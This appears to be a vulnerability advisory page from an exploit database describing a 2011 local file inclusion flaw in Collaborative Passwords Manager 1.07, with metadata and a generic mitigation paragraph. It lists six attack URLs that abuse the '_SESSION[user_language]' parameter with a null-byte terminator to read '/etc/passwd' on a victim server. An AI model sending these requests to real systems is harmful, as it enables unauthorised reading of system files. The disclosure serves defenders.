Collaborative Passwords Manager 1.07 Multiple Local Include Exploit

vendor:

Collaborative Passwords Manager

by:

sh00t0ut

7,5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: Collaborative Passwords Manager

Affected Version From: 1.07

Affected Version To: 1.07

Patch Exists: NO

Related CWE: N/A

CPE: a:cpassman:collaborative_passwords_manager

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2011

Collaborative Passwords Manager 1.07 Multiple Local Include Exploit

The Collaborative Passwords Manager 1.07 is vulnerable to local file inclusion. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server. The attacker can include a malicious file from the local system by using the ‘_SESSION[user_language]’ parameter. The malicious file can be included in the following URLs: http://[victim]/?_SESSION[user_language]=[etc/passwd]%00, http://[victim]/sources/admin.queries.php?_SESSION[user_language]=[etc/passwd]%00, http://[victim]/sources/functions.queries.php?_SESSION[user_language]=[etc/passwd]%00, http://[victim]/sources/views.queries.php?_SESSION[user_language]=[etc/passwd]%00, http://[victim]/sources/groups.queries.php?_SESSION[user_language]=[etc/passwd]%00, http://[victim]/sources/items.queries.php?_SESSION[user_language]=[etc/passwd]%00

Mitigation:

The application should be configured to only allow access to files that are necessary for the application to function. The application should also be configured to only allow access to files that are located in a specific directory. Additionally, the application should be configured to deny access to files that are not necessary for the application to function.

Source

Collaborative Passwords Manager 1.07 Multiple Local Include Exploit

Mitigation:

Exploit-DB raw data: